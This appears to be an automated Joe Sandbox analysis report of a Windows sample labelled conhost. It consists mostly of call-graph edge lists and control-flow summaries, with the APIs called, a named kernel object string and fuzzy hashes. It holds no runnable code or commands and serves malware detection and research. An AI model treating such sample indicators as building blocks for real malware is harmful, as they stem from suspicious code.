1400015f3 2278->2279 2279->2175 2280 140001503 2279->2280 2281 140001394 2 API calls 2280->2281 2282 14000150d 2281->2282 2283 140001394 2 API calls 2282->2283 2284 140001512 2283->2284 2285 140001394 2 API calls 2284->2285 2286 140001521 2285->2286 2287 140001394 2 API calls 2286->2287 2288 140001530 2287->2288 2289 140001394 2 API calls 2288->2289 2290 14000153f 2289->2290 2291 140001394 2 API calls 2290->2291 2292 14000154e 2291->2292 2293 140001394 2 API calls 2292->2293 2294 14000155d 2293->2294 2295 140001394 2 API calls 2294->2295 2296 14000156c 2295->2296 2297 140001394 2 API calls 2296->2297 2298 14000157b 2297->2298 2299 140001394 2 API calls 2298->2299 2300 14000158a 2299->2300 2301 140001394 2 API calls 2300->2301 2302 140001599 2301->2302 2303 140001394 2 API calls 2302->2303 2304 1400015a8 2303->2304 2305 140001394 2 API calls 2304->2305 2306 1400015b7 2305->2306 2307 140001394 2 API calls 2306->2307 2308 1400015c6 2307->2308 2309 140001394 2 API calls 2308->2309 2310 1400015d5 2309->2310 2311 140001394 2 API calls 2310->2311 2312 1400015e4 2311->2312 2313 140001394 2 API calls 2312->2313 2314 1400015f3 2313->2314 2314->2178 2315 14000156c 2314->2315 2316 140001394 2 API calls 2315->2316 2317 14000157b 2316->2317 2318 140001394 2 API calls 2317->2318 2319 14000158a 2318->2319 2320 140001394 2 API calls 2319->2320 2321 140001599 2320->2321 2322 140001394 2 API calls 2321->2322 2323 1400015a8 2322->2323 2324 140001394 2 API calls 2323->2324 2325 1400015b7 2324->2325 2326 140001394 2 API calls 2325->2326 2327 1400015c6 2326->2327 2328 140001394 2 API calls 2327->2328 2329 1400015d5 2328->2329 2330 140001394 2 API calls 2329->2330 2331 1400015e4 2330->2331 2332 140001394 2 API calls 2331->2332 2333 1400015f3 2332->2333 2333->2178 2334 14000145e 2333->2334 2335 140001394 2 API calls 2334->2335 2336 14000146d 2335->2336 2337 140001394 2 API calls 2336->2337 2338 14000147c 2337->2338 2339 140001394 2 API calls 2338->2339 2340 14000148b 2339->2340 2341 140001394 2 API calls 2340->2341 2342 14000149a 2341->2342 2343 140001394 2 API calls 2342->2343 2344 1400014a9 2343->2344 2345 140001394 2 API calls 2344->2345 2346 1400014b8 2345->2346 2347 140001394 2 API calls 2346->2347 2348 1400014c7 2347->2348 2349 140001394 2 API calls 2348->2349 2350 1400014d6 2349->2350 2351 1400014e5 2350->2351 2352 140001394 2 API calls 2350->2352 2353 140001394 2 API calls 2351->2353 2352->2351 2354 1400014ef 2353->2354 2355 1400014f4 2354->2355 2356 140001394 2 API calls 2354->2356 2357 140001394 2 API calls 2355->2357 2356->2355 2358 1400014fe 2357->2358 2359 140001503 2358->2359 2360 140001394 2 API calls 2358->2360 2361 140001394 2 API calls 2359->2361 2360->2359 2362 14000150d 2361->2362 2363 140001394 2 API calls 2362->2363 2364 140001512 2363->2364 2365 140001394 2 API calls 2364->2365 2366 140001521 2365->2366 2367 140001394 2 API calls 2366->2367 2368 140001530 2367->2368 2369 140001394 2 API calls 2368->2369 2370 14000153f 2369->2370 2371 140001394 2 API calls 2370->2371 2372 14000154e 2371->2372 2373 140001394 2 API calls 2372->2373 2374 14000155d 2373->2374 2375 140001394 2 API calls 2374->2375 2376 14000156c 2375->2376 2377 140001394 2 API calls 2376->2377 2378 14000157b 2377->2378 2379 140001394 2 API calls 2378->2379 2380 14000158a 2379->2380 2381 140001394 2 API calls 2380->2381 2382 140001599 2381->2382 2383 140001394 2 API calls 2382->2383 2384 1400015a8 2383->2384 2385 140001394 2 API calls 2384->2385 2386 1400015b7 2385->2386 2387 140001394 2 API calls 2386->2387 2388 1400015c6 2387->2388 2389 140001394 2 API calls 2388->2389 2390 1400015d5 2389->2390 2391 140001394 2 API calls 2390->2391 2392 1400015e4 2391->2392 2393 140001394 2 API calls 2392->2393 2394 1400015f3 2393->2394 2394->2178 2396 140001394 2 API calls 2395->2396 2397 14000147c 2396->2397 2398 140001394 2 API calls 2397->2398 2399 14000148b 2398->2399 2400 140001394 2 API calls 2399->2400 2401 14000149a 2400->2401 2402 140001394 2 API calls 2401->2402 2403 1400014a9 2402->2403 2404 140001394 2 API calls 2403->2404 2405 1400014b8 2404->2405 2406 140001394 2 API calls 2405->2406 2407 1400014c7 2406->2407 2408 140001394 2 API calls 2407->2408 2409 1400014d6 2408->2409 2410 1400014e5 2409->2410 2411 140001394 2 API calls 2409->2411 2412 140001394 2 API calls 2410->2412 2411->2410 2413 1400014ef 2412->2413 2414 1400014f4 2413->2414 2415 140001394 2 API calls 2413->2415 2416 140001394 2 API calls 2414->2416 2415->2414 2417 1400014fe 2416->2417 2418 140001503 2417->2418 2419 140001394 2 API calls 2417->2419 2420 140001394 2 API calls 2418->2420 2419->2418 2421 14000150d 2420->2421 2422 140001394 2 API calls 2421->2422 2423 140001512 2422->2423 2424 140001394 2 API calls 2423->2424 2425 140001521 2424->2425 2426 140001394 2 API calls 2425->2426 2427 140001530 2426->2427 2428 140001394 2 API calls 2427->2428 2429 14000153f 2428->2429 2430 140001394 2 API calls 2429->2430 2431 14000154e 2430->2431 2432 140001394 2 API calls 2431->2432 2433 14000155d 2432->2433 2434 140001394 2 API calls 2433->2434 2435 14000156c 2434->2435 2436 140001394 2 API calls 2435->2436 2437 14000157b 2436->2437 2438 140001394 2 API calls 2437->2438 2439 14000158a 2438->2439 2440 140001394 2 API calls 2439->2440 2441 140001599 2440->2441 2442 140001394 2 API calls 2441->2442 2443 1400015a8 2442->2443 2444 140001394 2 API calls 2443->2444 2445 1400015b7 2444->2445 2446 140001394 2 API calls 2445->2446 2447 1400015c6 2446->2447 2448 140001394 2 API calls 2447->2448 2449 1400015d5 2448->2449 2450 140001394 2 API calls 2449->2450 2451 1400015e4 2450->2451 2452 140001394 2 API calls 2451->2452 2453 1400015f3 2452->2453 2453->2209 2454 140001530 2453->2454 2455 140001394 2 API calls 2454->2455 2456 14000153f 2455->2456 2457 140001394 2 API calls 2456->2457 2458 14000154e 2457->2458 2459 140001394 2 API calls 2458->2459 2460 14000155d 2459->2460 2461 140001394 2 API calls 2460->2461 2462 14000156c 2461->2462 2463 140001394 2 API calls 2462->2463 2464 14000157b 2463->2464 2465 140001394 2 API calls 2464->2465 2466 14000158a 2465->2466 2467 140001394 2 API calls 2466->2467 2468 140001599 2467->2468 2469 140001394 2 API calls 2468->2469 2470 1400015a8 2469->2470 2471 140001394 2 API calls 2470->2471 2472 1400015b7 2471->2472 2473 140001394 2 API calls 2472->2473 2474 1400015c6 2473->2474 2475 140001394 2 API calls 2474->2475 2476 1400015d5 2475->2476 2477 140001394 2 API calls 2476->2477 2478 1400015e4 2477->2478 2479 140001394 2 API calls 2478->2479 2480 1400015f3 2479->2480 2480->2213 2480->2214 2482 140001394 2 API calls 2481->2482 2483 1400014b8 2482->2483 2484 140001394 2 API calls 2483->2484 2485 1400014c7 2484->2485 2486 140001394 2 API calls 2485->2486 2487 1400014d6 2486->2487 2488 1400014e5 2487->2488 2489 140001394 2 API calls 2487->2489 2490 140001394 2 API calls 2488->2490 2489->2488 2491 1400014ef 2490->2491 2492 1400014f4 2491->2492 2493 140001394 2 API calls 2491->2493 2494 140001394 2 API calls 2492->2494 2493->2492 2495 1400014fe 2494->2495 2496 140001503 2495->2496 2497 140001394 2 API calls 2495->2497 2498 140001394 2 API calls 2496->2498 2497->2496 2499 14000150d 2498->2499 2500 140001394 2 API calls 2499->2500 2501 140001512 2500->2501 2502 140001394 2 API calls 2501->2502 2503 140001521 2502->2503 2504 140001394 2 API calls 2503->2504 2505 140001530 2504->2505 2506 140001394 2 API calls 2505->2506 2507 14000153f 2506->2507 2508 140001394 2 API calls 2507->2508 2509 14000154e 2508->2509 2510 140001394 2 API calls 2509->2510 2511 14000155d 2510->2511 2512 140001394 2 API calls 2511->2512 2513 14000156c 2512->2513 2514 140001394 2 API calls 2513->2514 2515 14000157b 2514->2515 2516 140001394 2 API calls 2515->2516 2517 14000158a 2516->2517 2518 140001394 2 API calls 2517->2518 2519 140001599 2518->2519 2520 140001394 2 API calls 2519->2520 2521 1400015a8 2520->2521 2522 140001394 2 API calls 2521->2522 2523 1400015b7 2522->2523 2524 140001394 2 API calls 2523->2524 2525 1400015c6 2524->2525 2526 140001394 2 API calls 2525->2526 2527 1400015d5 2526->2527 2528 140001394 2 API calls 2527->2528 2529 1400015e4 2528->2529 2530 140001394 2 API calls 2529->2530 2531 1400015f3 2530->2531 2531->2221 2532 140001440 2531->2532 2533 140001394 2 API calls 2532->2533 2534 14000144f 2533->2534 2535 140001394 2 API calls 2534->2535 2536 14000145e 2535->2536 2537 140001394 2 API calls 2536->2537 2538 14000146d 2537->2538 2539 140001394 2 API calls 2538->2539 2540 14000147c 2539->2540 2541 140001394 2 API calls 2540->2541 2542 14000148b 2541->2542 2543 140001394 2 API calls 2542->2543 2544 14000149a 2543->2544 2545 140001394 2 API calls 2544->2545 2546 1400014a9 2545->2546 2547 140001394 2 API calls 2546->2547 2548 1400014b8 2547->2548 2549 140001394 2 API calls 2548->2549 2550 1400014c7 2549->2550 2551 140001394 2 API calls 2550->2551 2552 1400014d6 2551->2552 2553 1400014e5 2552->2553 2554 140001394 2 API calls 2552->2554 2555 140001394 2 API calls 2553->2555 2554->2553 2556 1400014ef 2555->2556 2557 1400014f4 2556->2557 2558 140001394 2 API calls 2556->2558 2559 140001394 2 API calls 2557->2559 2558->2557 2560 1400014fe 2559->2560 2561 140001503 2560->2561 2562 140001394 2 API calls 2560->2562 2563 140001394 2 API calls 2561->2563 2562->2561 2564 14000150d 2563->2564 2565 140001394 2 API calls 2564->2565 2566 140001512 2565->2566 2567 140001394 2 API calls 2566->2567 2568 140001521 2567->2568 2569 140001394 2 API calls 2568->2569 2570 140001530 2569->2570 2571 140001394 2 API calls 2570->2571 2572 14000153f 2571->2572 2573 140001394 2 API calls 2572->2573 2574 14000154e 2573->2574 2575 140001394 2 API calls 2574->2575 2576 14000155d 2575->2576 2577 140001394 2 API calls 2576->2577 2578 14000156c 2577->2578 2579 140001394 2 API calls 2578->2579 2580 14000157b 2579->2580 2581 140001394 2 API calls 2580->2581 2582 14000158a 2581->2582 2583 140001394 2 API calls 2582->2583 2584 140001599 2583->2584 2585 140001394 2 API calls 2584->2585 2586 1400015a8 2585->2586 2587 140001394 2 API calls 2586->2587 2588 1400015b7 2587->2588 2589 140001394 2 API calls 2588->2589 2590 1400015c6 2589->2590 2591 140001394 2 API calls 2590->2591 2592 1400015d5 2591->2592 2593 140001394 2 API calls 2592->2593 2594 1400015e4 2593->2594 2595 140001394 2 API calls 2594->2595 2596 1400015f3 2595->2596 2596->2221 2596->2226 2598 1400014e5 2597->2598 2599 140001394 2 API calls 2597->2599 2600 140001394 2 API calls 2598->2600 2599->2598 2601 1400014ef 2600->2601 2602 1400014f4 2601->2602 2603 140001394 2 API calls 2601->2603 2604 140001394 2 API calls 2602->2604 2603->2602 2605 1400014fe 2604->2605 2606 140001503 2605->2606 2607 140001394 2 API calls 2605->2607 2608 140001394 2 API calls 2606->2608 2607->2606 2609 14000150d 2608->2609 2610 140001394 2 API calls 2609->2610 2611 140001512 2610->2611 2612 140001394 2 API calls 2611->2612 2613 140001521 2612->2613 2614 140001394 2 API calls 2613->2614 2615 140001530 2614->2615 2616 140001394 2 API calls 2615->2616 2617 14000153f 2616->2617 2618 140001394 2 API calls 2617->2618 2619 14000154e 2618->2619 2620 140001394 2 API calls 2619->2620 2621 14000155d 2620->2621 2622 140001394 2 API calls 2621->2622 2623 14000156c 2622->2623 2624 140001394 2 API calls 2623->2624 2625 14000157b 2624->2625 2626 140001394 2 API calls 2625->2626 2627 14000158a 2626->2627 2628 140001394 2 API calls 2627->2628 2629 140001599 2628->2629 2630 140001394 2 API calls 2629->2630 2631 1400015a8 2630->2631 2632 140001394 2 API calls 2631->2632 2633 1400015b7 2632->2633 2634 140001394 2 API calls 2633->2634 2635 1400015c6 2634->2635 2636 140001394 2 API calls 2635->2636 2637 1400015d5 2636->2637 2638 140001394 2 API calls 2637->2638 2639 1400015e4 2638->2639 2640 140001394 2 API calls 2639->2640 2641 1400015f3 2640->2641 2641->2235 2643 140001394 2 API calls 2642->2643 2644 14000158a 2643->2644 2645 140001394 2 API calls 2644->2645 2646 140001599 2645->2646 2647 140001394 2 API calls 2646->2647 2648 1400015a8 2647->2648 2649 140001394 2 API calls 2648->2649 2650 1400015b7 2649->2650 2651 140001394 2 API calls 2650->2651 2652 1400015c6 2651->2652 2653 140001394 2 API calls 2652->2653 2654 1400015d5 2653->2654 2655 140001394 2 API calls 2654->2655 2656 1400015e4 2655->2656 2657 140001394 2 API calls 2656->2657 2658 1400015f3 2657->2658 2658->2235 2660 140001394 2 API calls 2659->2660 2661 1400015b7 2660->2661 2662 140001394 2 API calls 2661->2662 2663 1400015c6 2662->2663 2664 140001394 2 API calls 2663->2664 2665 1400015d5 2664->2665 2666 140001394 2 API calls 2665->2666 2667 1400015e4 2666->2667 2668 140001394 2 API calls 2667->2668 2669 1400015f3 2668->2669 2669->2235 2671 140001394 2 API calls 2670->2671 2672 140001530 2671->2672 2673 140001394 2 API calls 2672->2673 2674 14000153f 2673->2674 2675 140001394 2 API calls 2674->2675 2676 14000154e 2675->2676 2677 140001394 2 API calls 2676->2677 2678 14000155d 2677->2678 2679 140001394 2 API calls 2678->2679 2680 14000156c 2679->2680 2681 140001394 2 API calls 2680->2681 2682 14000157b 2681->2682 2683 140001394 2 API calls 2682->2683 2684 14000158a 2683->2684 2685 140001394 2 API calls 2684->2685 2686 140001599 2685->2686 2687 140001394 2 API calls 2686->2687 2688 1400015a8 2687->2688 2689 140001394 2 API calls 2688->2689 2690 1400015b7 2689->2690 2691 140001394 2 API calls 2690->2691 2692 1400015c6 2691->2692 2693 140001394 2 API calls 2692->2693 2694 1400015d5 2693->2694 2695 140001394 2 API calls 2694->2695 2696 1400015e4 2695->2696 2697 140001394 2 API calls 2696->2697 2698 1400015f3 2697->2698 2698->2235 2700 140001394 2 API calls 2699->2700 2701 140001431 2700->2701 2702 140001394 2 API calls 2701->2702 2703 140001440 2702->2703 2704 140001394 2 API calls 2703->2704 2705 14000144f 2704->2705 2706 140001394 2 API calls 2705->2706 2707 14000145e 2706->2707 2708 140001394 2 API calls 2707->2708 2709 14000146d 2708->2709 2710 140001394 2 API calls 2709->2710 2711 14000147c 2710->2711 2712 140001394 2 API calls 2711->2712 2713 14000148b 2712->2713 2714 140001394 2 API calls 2713->2714 2715 14000149a 2714->2715 2716 140001394 2 API calls 2715->2716 2717 1400014a9 2716->2717 2718 140001394 2 API calls 2717->2718 2719 1400014b8 2718->2719 2720 140001394 2 API calls 2719->2720 2721 1400014c7 2720->2721 2722 140001394 2 API calls 2721->2722 2723 1400014d6 2722->2723 2724 1400014e5 2723->2724 2725 140001394 2 API calls 2723->2725 2726 140001394 2 API calls 2724->2726 2725->2724 2727 1400014ef 2726->2727 2728 1400014f4 2727->2728 2729 140001394 2 API calls 2727->2729 2730 140001394 2 API calls 2728->2730 2729->2728 2731 1400014fe 2730->2731 2732 140001503 2731->2732 2733 140001394 2 API calls 2731->2733 2734 140001394 2 API calls 2732->2734 2733->2732 2735 14000150d 2734->2735 2736 140001394 2 API calls 2735->2736 2737 140001512 2736->2737 2738 140001394 2 API calls 2737->2738 2739 140001521 2738->2739 2740 140001394 2 API calls 2739->2740 2741 140001530 2740->2741 2742 140001394 2 API calls 2741->2742 2743 14000153f 2742->2743 2744 140001394 2 API calls 2743->2744 2745 14000154e 2744->2745 2746 140001394 2 API calls 2745->2746 2747 14000155d 2746->2747 2748 140001394 2 API calls 2747->2748 2749 14000156c 2748->2749 2750 140001394 2 API calls 2749->2750 2751 14000157b 2750->2751 2752 140001394 2 API calls 2751->2752 2753 14000158a 2752->2753 2754 140001394 2 API calls 2753->2754 2755 140001599 2754->2755 2756 140001394 2 API calls 2755->2756 2757 1400015a8 2756->2757 2758 140001394 2 API calls 2757->2758 2759 1400015b7 2758->2759 2760 140001394 2 API calls 2759->2760 2761 1400015c6 2760->2761 2762 140001394 2 API calls 2761->2762 2763 1400015d5 2762->2763 2764 140001394 2 API calls 2763->2764 2765 1400015e4 2764->2765 2766 140001394 2 API calls 2765->2766 2767 1400015f3 2766->2767 2767->2235 2769 140001394 2 API calls 2768->2769 2770 140001440 2769->2770 2771 140001394 2 API calls 2770->2771 2772 14000144f 2771->2772 2773 140001394 2 API calls 2772->2773 2774 14000145e 2773->2774 2775 140001394 2 API calls 2774->2775 2776 14000146d 2775->2776 2777 140001394 2 API calls 2776->2777 2778 14000147c 2777->2778 2779 140001394 2 API calls 2778->2779 2780 14000148b 2779->2780 2781 140001394 2 API calls 2780->2781 2782 14000149a 2781->2782 2783 140001394 2 API calls 2782->2783 2784 1400014a9 2783->2784 2785 140001394 2 API calls 2784->2785 2786 1400014b8 2785->2786 2787 140001394 2 API calls 2786->2787 2788 1400014c7 2787->2788 2789 140001394 2 API calls 2788->2789 2790 1400014d6 2789->2790 2791 1400014e5 2790->2791 2792 140001394 2 API calls 2790->2792 2793 140001394 2 API calls 2791->2793 2792->2791 2794 1400014ef 2793->2794 2795 1400014f4 2794->2795 2796 140001394 2 API calls 2794->2796 2797 140001394 2 API calls 2795->2797 2796->2795 2798 1400014fe 2797->2798 2799 140001503 2798->2799 2800 140001394 2 API calls 2798->2800 2801 140001394 2 API calls 2799->2801 2800->2799 2802 14000150d 2801->2802 2803 140001394 2 API calls 2802->2803 2804 140001512 2803->2804 2805 140001394 2 API calls 2804->2805 2806 140001521 2805->2806 2807 140001394 2 API calls 2806->2807 2808 140001530 2807->2808 2809 140001394 2 API calls 2808->2809 2810 14000153f 2809->2810 2811 140001394 2 API calls 2810->2811 2812 14000154e 2811->2812 2813 140001394 2 API calls 2812->2813 2814 14000155d 2813->2814 2815 140001394 2 API calls 2814->2815 2816 14000156c 2815->2816 2817 140001394 2 API calls 2816->2817 2818 14000157b 2817->2818 2819 140001394 2 API calls 2818->2819 2820 14000158a 2819->2820 2821 140001394 2 API calls 2820->2821 2822 140001599 2821->2822 2823 140001394 2 API calls 2822->2823 2824 1400015a8 2823->2824 2825 140001394 2 API calls 2824->2825 2826 1400015b7 2825->2826 2827 140001394 2 API calls 2826->2827 2828 1400015c6 2827->2828 2829 140001394 2 API calls 2828->2829 2830 1400015d5 2829->2830 2831 140001394 2 API calls 2830->2831 2832 1400015e4 2831->2832 2833 140001394 2 API calls 2832->2833 2834 1400015f3 2833->2834 2834->2235

                                                            Callgraph

                                                            • Executed
                                                            • Not Executed
                                                            • Opacity -> Relevance
                                                            • Disassembly available
                                                            callgraph 0 Function_00000001400056E1 1 Function_0000000140001AE4 31 Function_0000000140001D40 1->31 76 Function_0000000140001BA0 1->76 2 Function_00000001400014E5 72 Function_0000000140001394 2->72 3 Function_00000001400010F0 4 Function_00000001400030F1 5 Function_00000001400014F4 5->72 6 Function_0000000140001800 65 Function_0000000140002290 6->65 7 Function_0000000140001000 8 Function_0000000140001E00 7->8 40 Function_0000000140001750 7->40 80 Function_0000000140001FB0 7->80 87 Function_0000000140001FC0 7->87 9 Function_0000000140002F00 56 Function_0000000140001370 9->56 10 Function_0000000140005C00 32 Function_0000000140005940 10->32 11 Function_0000000140002500 12 Function_0000000140005701 13 Function_0000000140005801 14 Function_0000000140001503 14->72 15 Function_0000000140001404 15->72 16 Function_0000000140002104 17 Function_0000000140001E10 18 Function_0000000140003110 19 Function_0000000140001512 19->72 20 Function_0000000140002420 21 Function_0000000140002320 22 Function_0000000140005920 23 Function_0000000140001521 23->72 24 Function_0000000140005721 25 Function_0000000140001422 25->72 26 Function_0000000140001530 26->72 27 Function_0000000140003130 28 Function_0000000140001431 28->72 29 Function_0000000140005631 30 Function_000000014000153F 30->72 31->65 33 Function_0000000140001440 33->72 34 Function_0000000140001140 47 Function_0000000140001160 34->47 35 Function_0000000140005741 36 Function_0000000140001F47 57 Function_0000000140001870 36->57 37 Function_0000000140002050 38 Function_0000000140005950 38->32 39 Function_0000000140003150 39->9 39->14 39->23 39->25 39->26 39->28 39->30 39->32 39->33 45 Function_000000014000145E 39->45 46 Function_0000000140002660 39->46 52 Function_000000014000156C 39->52 53 Function_000000014000146D 39->53 39->56 62 Function_000000014000157B 39->62 77 Function_00000001400015A8 39->77 78 Function_00000001400014A9 39->78 86 Function_00000001400016C0 39->86 97 Function_00000001400014D6 39->97 98 Function_00000001400026E0 39->98 41 Function_0000000140001650 42 Function_0000000140003051 43 Function_0000000140005651 44 Function_000000014000155D 44->72 45->72 47->39 47->47 47->57 63 Function_0000000140001880 47->63 64 Function_0000000140001F90 47->64 47->86 48 Function_0000000140001760 99 Function_00000001400020E0 48->99 49 Function_0000000140002460 50 Function_0000000140005761 51 Function_0000000140001E65 51->57 52->72 53->72 54 Function_000000014000216F 55 Function_0000000140001A70 55->31 55->76 58 Function_0000000140003070 59 Function_0000000140005770 60 Function_0000000140005671 61 Function_0000000140005871 62->72 63->20 63->31 63->46 63->76 66 Function_0000000140002590 67 Function_0000000140003090 68 Function_0000000140002691 69 Function_0000000140005691 70 Function_0000000140005791 71 Function_0000000140005891 72->10 72->38 73 Function_0000000140002194 73->57 74 Function_000000014000219E 75 Function_0000000140001FA0 76->31 79 Function_00000001400023B0 76->79 94 Function_00000001400024D0 76->94 77->72 78->72 81 Function_00000001400022B0 82 Function_00000001400026B0 83 Function_00000001400030B1 84 Function_00000001400056B1 85 Function_0000000140001AB3 85->31 85->76 88 Function_00000001400057C1 89 Function_00000001400058C1 90 Function_0000000140001AC3 90->31 90->76 91 Function_00000001400014C7 91->72 92 Function_0000000140001FD0 93 Function_00000001400017D0 95 Function_00000001400026D0 96 Function_0000000140001AD4 96->31 96->76 97->72 98->2 98->5 98->14 98->19 98->32 98->44 98->45 98->46 98->56 98->78 98->91 100 Function_00000001400017E0 100->99 101 Function_00000001400022E0

                                                            Control-flow Graph

                                                            APIs
                                                            • NtPlugPlayControl.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001156), ref: 00000001400013F7
                                                            Memory Dump Source
                                                            • Source File: 0000003A.00000002.3902415484.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                            • Associated: 0000003A.00000002.3902381941.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000003A.00000002.3902452870.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000003A.00000002.3902485591.0000000140008000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000003A.00000002.3902509699.0000000140009000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_58_2_140000000_conhost.jbxd
                                                            Similarity
                                                            • API ID: ControlPlayPlug
                                                            • String ID:
                                                            • API String ID: 481578142-0
                                                            • Opcode ID: d97a18cbf843856e81387b8c8340dc9f3be9b88f7afb7d8bd8691dbd3188d6e4
                                                            • Instruction ID: c0201615fb3c5339c68770815eb7f3da7c935e7eca38d8337486676928192f30
                                                            • Opcode Fuzzy Hash: d97a18cbf843856e81387b8c8340dc9f3be9b88f7afb7d8bd8691dbd3188d6e4
                                                            • Instruction Fuzzy Hash: 29F09DB2608B40C6EAA2DB52F85579A77A0F38D7D4F009919BBC843735DB38C1A48F44

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 296 1400026e0-14000273b call 140002660 memset 299 140002741-14000274b 296->299 300 14000280e-14000285e call 14000155d 296->300 302 140002774-14000277a 299->302 305 140002953-14000297b call 1400014c7 300->305 306 140002864-140002873 300->306 302->300 304 140002780-140002787 302->304 307 140002789-140002792 304->307 308 140002750-140002752 304->308 323 140002986-1400029c8 call 140001503 call 140005940 memset 305->323 324 14000297d 305->324 309 140002eb7-140002ef4 call 140001370 306->309 310 140002879-140002888 306->310 313 140002794-1400027ab 307->313 314 1400027f8-1400027fb 307->314 311 14000275a-14000276e 308->311 315 1400028e4-14000294e wcsncmp call 1400014e5 310->315 316 14000288a-1400028dd 310->316 311->300 311->302 319 1400027f5 313->319 320 1400027ad-1400027c2 313->320 314->311 315->305 316->315 319->314 325 1400027d0-1400027d7 320->325 332 140002e49-140002e84 call 140001370 323->332 333 1400029ce-1400029d5 323->333 324->323 326 1400027d9-1400027f3 325->326 327 140002800-140002809 325->327 326->319 326->325 327->311 336 1400029d7-140002a0c 332->336 340 140002e8a 332->340 335 140002a13-140002a43 wcscpy wcscat wcslen 333->335 333->336 338 140002a45-140002a76 wcslen 335->338 339 140002a78-140002aa5 335->339 336->335 341 140002aa8-140002abf wcslen 338->341 339->341 340->335 342 140002ac5-140002ad8 341->342 343 140002e8f-140002eab call 140001370 341->343 345 140002af5-140002dfb wcslen call 1400014a9 * 2 call 1400014f4 call 1400014c7 * 2 call 14000145e * 3 342->345 346 140002ada-140002aee 342->346 343->309 364 140002dfd-140002e1b call 140001512 345->364 365 140002e20-140002e48 call 14000145e 345->365 346->345 364->365
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000003A.00000002.3902415484.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                            • Associated: 0000003A.00000002.3902381941.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000003A.00000002.3902452870.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000003A.00000002.3902485591.0000000140008000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000003A.00000002.3902509699.0000000140009000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_58_2_140000000_conhost.jbxd
                                                            Similarity
                                                            • API ID: wcslen$memset$wcscatwcscpywcsncmp
                                                            • String ID: 0$X$\BaseNamedObjects\ojmcbfrswiuvrxcxaekmxnen$`
                                                            • API String ID: 780471329-1588479602
                                                            • Opcode ID: 8a22a1da9c51625649be36b9debd828fc691dfe2a5c1e23ab98296de14dac146
                                                            • Instruction ID: 6bba8aa20afe6034e5db5a0fddf623d34e700f3f7fdd9c0d08fe15b63ce627f7
                                                            • Opcode Fuzzy Hash: 8a22a1da9c51625649be36b9debd828fc691dfe2a5c1e23ab98296de14dac146
                                                            • Instruction Fuzzy Hash: D81236B2608BC086E762DB16F8443EA77A4F789794F404215EBE957BB5EF78C189C700

                                                            Control-flow Graph

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000003A.00000002.3902415484.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                            • Associated: 0000003A.00000002.3902381941.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000003A.00000002.3902452870.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000003A.00000002.3902485591.0000000140008000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000003A.00000002.3902509699.0000000140009000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_58_2_140000000_conhost.jbxd
                                                            Similarity
                                                            • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                            • String ID:
                                                            • API String ID: 2643109117-0
                                                            • Opcode ID: 9ef8a84ff62fc8080a208a117a9968907c12ab36c06ad82fa9b6208203aea5f1
                                                            • Instruction ID: 30de971cd36702d147e9a687a6551761c6e16fdd3e731554fde7caf8b7e47907
                                                            • Opcode Fuzzy Hash: 9ef8a84ff62fc8080a208a117a9968907c12ab36c06ad82fa9b6208203aea5f1
                                                            • Instruction Fuzzy Hash: 855107B1611A4485FA66EF27F9543EA27A1B78D7C0F449025FF8D877B2DE38C5958300

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 410 140001ba0-140001bc0 411 140001bc2-140001bd7 410->411 412 140001c09 410->412 414 140001be9-140001bf1 411->414 413 140001c0c-140001c17 call 1400023b0 412->413 420 140001cf4-140001cfe call 140001d40 413->420 421 140001c1d-140001c6c call 1400024d0 VirtualQuery 413->421 416 140001bf3-140001c02 414->416 417 140001be0-140001be7 414->417 416->417 419 140001c04 416->419 417->413 417->414 422 140001cd7-140001cf3 memcpy 419->422 425 140001d03-140001d1e call 140001d40 420->425 421->425 428 140001c72-140001c79 421->428 429 140001d23-140001d38 GetLastError call 140001d40 425->429 430 140001c7b-140001c7e 428->430 431 140001c8e-140001c97 428->431 433 140001cd1 430->433 434 140001c80-140001c83 430->434 435 140001ca4-140001ccf VirtualProtect 431->435 436 140001c99-140001c9c 431->436 433->422 434->433 438 140001c85-140001c8a 434->438 435->429 435->433 436->433 439 140001c9e 436->439 438->433 440 140001c8c 438->440 439->435 440->439
                                                            APIs
                                                            • VirtualQuery.KERNEL32(?,?,?,?,0000000140006C10,0000000140006C10,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001C63
                                                            • VirtualProtect.KERNEL32(?,?,?,?,0000000140006C10,0000000140006C10,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001CC7
                                                            • memcpy.MSVCRT ref: 0000000140001CE0
                                                            • GetLastError.KERNEL32(?,?,?,?,0000000140006C10,0000000140006C10,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001D23
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000003A.00000002.3902415484.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                            • Associated: 0000003A.00000002.3902381941.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
